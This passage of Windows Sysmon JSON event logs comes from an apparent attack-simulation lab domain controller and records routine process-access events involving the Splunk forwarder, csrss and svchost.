Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5932,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:53.911\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-03AD-5F25-0000-00106BFC0A00}\r\nTargetProcessId: 2820\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:53.911","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-03AD-5F25-0000-00106BFC0A00}","TargetProcessId":"2820","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5933,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:53.911\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-03AD-5F25-0000-00106BFC0A00}\r\nTargetProcessId: 2820\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:53.911","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-03AD-5F25-0000-00106BFC0A00}","TargetProcessId":"2820","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5934,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:53.911\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:53.911","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5935,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:53.911\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:53.911","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5936,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:53.911\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:53.911","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5937,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:53.911\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:53.911","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5938,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:53.911\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:53.911","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5939,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:53.911\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:53.911","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
